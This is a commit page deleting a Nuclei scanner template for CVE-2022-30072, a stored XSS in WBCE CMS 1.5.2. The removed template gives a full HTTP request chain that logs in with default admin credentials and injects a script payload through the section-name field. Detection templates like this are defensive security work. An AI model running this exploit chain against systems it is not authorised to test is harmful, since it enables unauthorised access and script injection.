Delete CVE-2022-30072.yaml

patch-1
Prince Chaddha 2022-07-10 11:07:36 +05:30 committed by GitHub
parent 1633c093b3
commit 10d7609103
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 0 additions and 73 deletions

View File

@ -1,73 +0,0 @@
id: CVE-2022-30072
info:
name: WBCE CMS v1.5.2 XSS Stored
author: arafatansari
severity: medium
description: |
WBCE CMS 1.5.2 is vulnerable to Cross Site Scripting (XSS) via \admin\pages\sections_save.php namesection2 parameters.
reference:
- https://github.com/APTX-4879/CVE
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30072
metadata:
verified: true
tags: wbcecms,xss
requests:
- raw:
- |
POST /wbcecms/wbce/admin/login/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh=admin&password_axh5kevh=Admin@123&submit=Login
- |
GET /wbcecms/wbce/admin/users/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- |
POST /wbcecms/wbce/admin/pages/add.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
formtoken={{formtoken}}&title=final&type=wysiwyg&parent=0&visibility=public&save=
- |
POST /wbcecms/wbce/admin/pages/sections_save.php?page_id=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
formtoken={{formtoken}}&page_id=1&section_id=1&block1=1&namesection1=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&start_date1=04.07.2022+15%3A46&end_date1=19.07.2022+15%3A46&saveandback=saveandback
- |
GET /wbcecms/wbce/admin/pages/modify.php?page_id=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
cookie-reuse: true
extractors:
- type: regex # type of extractor
name: formtoken # defining the variable name
part: body # part of response to look for
group: 1
regex:
- '<input\stype="hidden"\sname="formtoken"\svalue="([^"]*)"\s/>'
internal: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(1)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200